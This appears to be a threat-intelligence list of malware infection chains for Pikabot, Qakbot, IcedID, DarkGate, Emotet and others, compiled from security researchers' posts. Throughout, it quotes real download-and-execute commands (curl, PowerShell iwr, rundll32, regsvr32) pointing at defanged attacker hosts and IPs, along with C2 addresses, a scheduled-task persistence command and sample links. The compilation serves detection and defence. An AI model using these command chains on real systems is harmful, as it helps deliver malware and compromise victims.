Top 50 Techniques & Procedures

url > .zip > .js > .dll

#Pikabot - #TA577 - url > .zip > .js > .dll twitter.com/Cryptolaemus1/status/1709933199..

proxy everywhere

#Pikabot - #TA577 - url > .zip > .js > .dll

wscript PO_13670.js

cmd /c mkdir C:\ProgramData\LimdD\

WinHttp superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll

rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var

IOC's github.com/pr0xylife/Pikabot/blob/main/Pika..

url > .zip > .lnk > curl > .dll

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll twitter.com/Cryptolaemus1/status/1709238615..

proxy everywhere

#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll

cmd /c TZZ.pdf.lnk

curl 207.246.78.]68/6kQh/T7t -o UL.log

rundll32 UL.dll, HUF_inc_var

c2's 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078

IOC's github.com/pr0xylife/Pikabot/blob/main/Pika..

url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe twitter.com/Cryptolaemus1/status/1708869147..

proxy everywhere

#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe

cmd /c MFGT.lnk

curl 136.244.92.]148/rdFR2/GbB -o fjw.vbs

wscript fjw.vbs

cmd /c mkdir c:\rqdp

curl http://81.19.135.]17:2351 -o nvptjf.au3

Autoit3.exe nvptjf.au3

IOC's github.com/pr0xylife/DarkGate/blob/main/Dar..

url > .zip > lnk > .vbs > .exe

#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe twitter.com/Cryptolaemus1/status/1708869147..

url > .xll > curl > .dll

#IcedID - #TA577 - url > .xll > curl > .dll twitter.com/Cryptolaemus1/status/1706635492..

proxy everywhere

#IcedID - #TA577 - url > .xll > curl > .dll

EXCEL.EXE Sr.xll

cmd /c curl -o c:\users\public\9y.dat 135.125.177.]95/syK/3IldTx

rundll32 c:\users\public\9y.dat scab /k besogon728

Samples 👇

bazaar.abuse.ch/sample/310b9b7f54880f214288..

bazaar.abuse.ch/sample/f45d0303851f913cef47..

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

pdf > url > .js > ps > .dll

#Qakbot - BB32 - pdf > url > .js > ps > .dll twitter.com/Cryptolaemus1/status/1669669651..

proxy everywhere

#Qakbot - BB32 - pdf > url > .js > ps > .dll

wscript Cx.js

powershell $res = "149.154.158.]191/znxlW/MGjrJji3RDB"; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll

rundll32 C:\ProgramData\99.9.dll,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > curl > .dll

#Qakbot - obama268 - .pdf > .zip > curl > .dll twitter.com/Cryptolaemus1/status/1669024540..

proxy everywhere

#Qakbot - obama268 - .pdf > .zip > curl > .dll

wscript CalculationOfCosts-1337.js

cmd.exe /c mkdir C:\Koltes\Fertiol & curl rapiska.]com/1337dat --output C:\Koltes\Fertiol\Floster.OCX

rundll32 C:\Koltes\Fertiol\Floster.OCX,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .js > curl > .dll

#Qakbot - BB32 - url > .zip > .js > curl > .dll twitter.com/Cryptolaemus1/status/1668965414..

proxy everywhere

#Qakbot - BB32 - url > .zip > .js > curl > .dll

wscript.exe docu_DF631_Jun_14_1.js

curl.exe -o c:\users\public\amounted.tmp 192.121.17.]149/QmVep/DB278

conhost.exe rundll32.exe amounted.tmp,must

rundll32.exe amounted.tmp,must

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .js > .msi > .dll

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll twitter.com/Cryptolaemus1/status/1664300425..

proxy everywhere

#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll

wscript.exe ProjectFunding_1337_Jun01.js

msiexec.exe /V

rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

BB19 - .html > url > .js > .ps > .dll

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll twitter.com/pr0xylife/status/16364024139123..

#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll

wscript.exe LL.js

$Mag = (hanika-inc.]com/mjnPR9/uo)

foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll

rundll32 $env:TEMP\Sulfuryl.dll,LS88

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .wsf > xmlhttp > .dll

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll twitter.com/Cryptolaemus1/status/1661413082..

#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll

wscript.exe Claim_C736.wsf

var u = "45.76.58.]72/a0UFMZnC6ltxphw.dat" http.open("GET", u[i], false)

conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.one > .iso > .chm > ps > .dll

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll twitter.com/Cryptolaemus1/status/1648632165..

#Qakbot - BB24 - .one > .iso > .chm > ps > .dll

hh E:\README-JRN44.chm

powershell $sensillum = ("hotellosmirtos.]com/sjn/Tn0Q3nieE")

foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra

rundll32 $env:TEMP\hexatetra,Motd

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.one > .img > .wsf > ps > .dll

#Qakbot - BB22 - .one > .img > .wsf > ps > .dll twitter.com/Cryptolaemus1/status/1643614470..

#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll

wscript AprilDetails.wsf

powershell $spear = ("kmphi.]com/FWovmB/8oZ0BOV5HqEX")

foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses

rundll32 $env:TEMP\Lownesses,X555

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .js > ps > .dll

#Qakbot - BB33 - url > .js > ps > .dll twitter.com/Cryptolaemus1/status/1671489179..

#Qakbot - BB33 - url > .js > ps > .dll

wscript Ix.js

powershell -encodedcommand $N = "151.236.14.]60/c1oHe/q9cRd2n0"

md C:\ProgramData\SNWSlycop

iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll

rundll32 C:\ProgramData\SNWSlycop\joind.dll

IOC's github.com/pr0xylife/Qakb

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com twitter.com/k3dg3/status/1612860949773389835

Today's #IcedID "1421378695" dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*

Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com

bazaar.abuse.ch/sample/1796aef0940e800bcb25..

hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID twitter.com/k3dg3/status/1697331227940798731

#IcedID "4240553492" rolling in

c2: oopscokir.com ProjectID: 4240553492

filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php

tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID

email > PDF > URL > Keitaro redirect > zip > pass > exe

email > PDF > URL > Keitaro redirect > zip > pass > exe twitter.com/k3dg3/status/1683544196341219341

Incoming #IcedID "1561373935" filename: inv-details-jul23.pdf

Loader C2: filtaferamoza.com

email > PDF > URL > Keitaro redirect > zip > pass > exe

tria.ge/230724-w1dlaaha6w/behavioral1 bazaar.abuse.ch/sample/8b5529d29aeaf195889e..

url > zip > lnk url > xll pdf > url > xll > msi

url > zip > lnk url > xll pdf > url > xll > msi twitter.com/pr0xylife/status/17053311013658..

#TA577 - Back on the scene pushing #Darkgate

Time to resume tracking operations, welcome back Tramp.

Distro 👇

url > zip > lnk
url > xll
pdf > url > xll > msi

Samples 👇

bazaar.abuse.ch/sample/026f4c95783ed33bc31c..

bazaar.abuse.ch/sample/2eee7af95e457c97fb0b..

bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd..

bazaar.abuse.ch/sample/5bc060bd720757919db4..

.zip > .doc > .dll

#Emotet- epoch4 - .zip > .doc > .dll twitter.com/pr0xylife/status/16330969100084..

#Emotet- epoch4 - .zip > .doc > .dll

WINWORD.EXE /n INVOICE 589 03_23.doc /o

midcoastsupplies.]com].au/configNQS/Es2oE4G..

regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll

IOC's github.com/pr0xylife/Emotet/blob/main/e4_em..

.pdf > .url > .zip > .iso > .cmd > .exe

#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe twitter.com/pr0xylife/status/16164649501381..

#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll

cmd.exe /c REF_Document.lnk

cmd.exe /c sacsimsapI.cmd

rundll32 standing.dat,init

c2's

umousteraton.]com

Samples here 👇

bazaar.abuse.ch/sample/3390b1d8560f565ed5e2..

bazaar.abuse.ch/sample/ad174760985c5418b4a3..

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

url > .zip > .one > .hta > .curl > .dll

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll twitter.com/pr0xylife/status/16207513404851..

#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll

mshta Open.hta

curl -o C:\ProgramData\index.png --url billmanagersystem.]com/ikA/d.gif

rundll32 C:\ProgramData\index.png,Wind

Samples 👇

bazaar.abuse.ch/sample/6c49b4d40b2925a4e591..

bazaar.abuse.ch/sample/284f0fabbdfc1172cb1c..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.pdf > .zip > .js > .dll

#Qakbot - obama270 - .pdf > .zip > .js > .dll twitter.com/Cryptolaemus1/status/1671528958..

#Qakbot - obama270 - .pdf > .zip > .js > .dll

wscript RrwuR.js

powershell -enc $bread = "viltare.]com/PlI6qXoN.dat"

md C:\ProgramData\SNWSPinna

iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll

rundll32 C:\ProgramData\SNWSPinna\Pinna.dll

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll twitter.com/pr0xylife/status/15997873753112..

#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll

cmd /c HG.lnk

cmd.exe /q /c pests.cmd

cmd.exe /K dispersers.cmd system rundl

rundll32 erect.tmp,DrawThemeIcon

Samples 👇

bazaar.abuse.ch/sample/15c1feb12ecedafc233e..

bazaar.abuse.ch/sample/c6887e515b36694e8e73..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

url > .zip > .xlsb > .dll

#Qakbot - bb - url > .zip > .xlsb > .dll twitter.com/pr0xylife/status/15776714553361..

#Qakbot - bb - url > .zip > .xlsb > .dll

CreateDirectoryA C:\Hefagga

CreateDirectoryA C:\Hefaggad\Ukdfaovkga

metroberrylocalmarketing.]com/7z8b/0.html

regsvr32 /s calc

regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll

bazaar.abuse.ch/sample/d3788e69dd125449af3d..

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.html > .zip > .iso > .lnk > .png > .dll

#IcedID - .html > .zip > .iso > .lnk > .png > .dll twitter.com/pr0xylife/status/15759033825055..

#IcedID - .html > .zip > .iso > .lnk > .png > .dll

cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit

bazaar.abuse.ch/sample/0ab12d65800f3e7e6089..

c2 triskawilko.]com

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

url > .zip > .lnk > curl > wscript > curl > .dll

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll twitter.com/pr0xylife/status/15700643109233..

#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll

MD "C:\ProgramData\A_Np\fcA"

curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html

wscript.exe GCk.js

paritoys.]com/9nD/130.html

regsvr32 REPORT_9MyMg_.SRm.IH.dll

IOC's github.com/pr0xylife/Qakbot/blob/main/Qakbo..

.zip > .docm > .curl > .dll

#IcedID - .zip > .docm > .curl > .dll twitter.com/pr0xylife/status/15653543637652..

#IcedID - .zip > .docm > .curl > .dll

cmd /c curl 193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1

bazaar.abuse.ch/sample/133245a337b1703f3940..

c2 donorcabr.]com

IOC's github.com/pr0xylife/IcedID/blob/main/icedI..

EML>.tar.gz>.exe

EML>.tar.gz>.exe twitter.com/Tac_Mangusta/status/17091077860..

EML>zip pw>.url>SMB>zip>vbs>certutil

EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif twitter.com/JAMESWT_MHT/status/170691921458..

pec > .zip > .url > .exe (smb)

pec > .zip > .url > .exe (smb) twitter.com/Tac_Mangusta/status/17037167082..

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)

Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key) twitter.com/Tac_Mangusta/status/17022475125..

USB > .lnk > .ps1 > .exe

USB > .lnk > .ps1 > .exe twitter.com/Tac_Mangusta/status/16781859813..

LZH > EXE

LZH > EXE twitter.com/reecdeep/status/169653942021905..

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLL's

Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLL's twitter.com/0xToxin/status/1694756006889206..

Bumblebee

#Bumblebee Infection Flow TTPs🐝
[+] Mark-of-the-Web Bypass: IMG (T1553.005)
[+] Malicious File: LNK (T1204.002)
[+] Windows Command Shell: BAT (T1059.003)
[+] Rename System Utilities: copy & rename (T1036.003)
[+] Scheduled Task: schtasks.exe (T1053.005)
[+] Rundll32 (T1218.011)

twitter.com/Max_Mal_/status/160084767627000..

HTML to PluginInit

[+] HTML Smuggling (T1027.006)
[+] Msiexec - .msi stager (T1218.007)
[+] Rundll32 - .dll loader (T1218.011)
[+] New export func: init, a short version of PluginInit🔥

#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32 twitter.com/Max_Mal_/status/160043385493786..

EML>Pdf>Url>js>url>js>url>PEDLL

EML>Pdf>Url>js>url>js>url>PEDLL> twitter.com/JAMESWT_MHT/status/167898279170..

Onenote sample > Bat > curl url > Dll

Onenote sample > Bat > curl url > Dll twitter.com/JAMESWT_MHT/status/164178266150..

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf

bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf twitter.com/JAMESWT_MHT/status/165878579939..

Qakbot js

Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE
conhost => conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat, next
conhost => conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat, next
conhost => conhost.exe rundll32.exe C:\Users\alice\noises.dat, next
rundll32 => rundll32.exe C:\Users\alice\noises.dat, next
rundll32 => rundll32.exe C:\Users\alice\noises.dat, next
explorer C:\Windows\SysWOW64\explorer.exe

twitter.com/ACEResponder

Pikabot

#Pikabot execution chain:
➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution)
➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39)
➡️ whoami.exe /all
➡️ ipconfig.exe /all
➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min "" powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change)
NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe
➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"
➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot
➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologi.. -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output)
➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload)
➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)

twitter.com/AnFam17

#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32

#Qakbot DLL Side-Loading #TTPs #DFIR exec flow: ZIP > EXE&DLL > curl > rundll32 twitter.com/Max_Mal_

Redirect Services

⚠️ Legitimate Services Abused For Phishing Purposes

1- Bing Redirect - app.any.run/tasks/9a1e55eb-05c5-499b-b995-d..

2- Google AMP - app.any.run/tasks/544a7608-87b2-4e37-9804-5..

3- Microsoft Customer Voice - app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f..

4- Cloudflare R2 Dev Bucket - app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7..

twitter.com/anyrun_app/status/1709193919118..

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT

twitter.com/dark0pcodes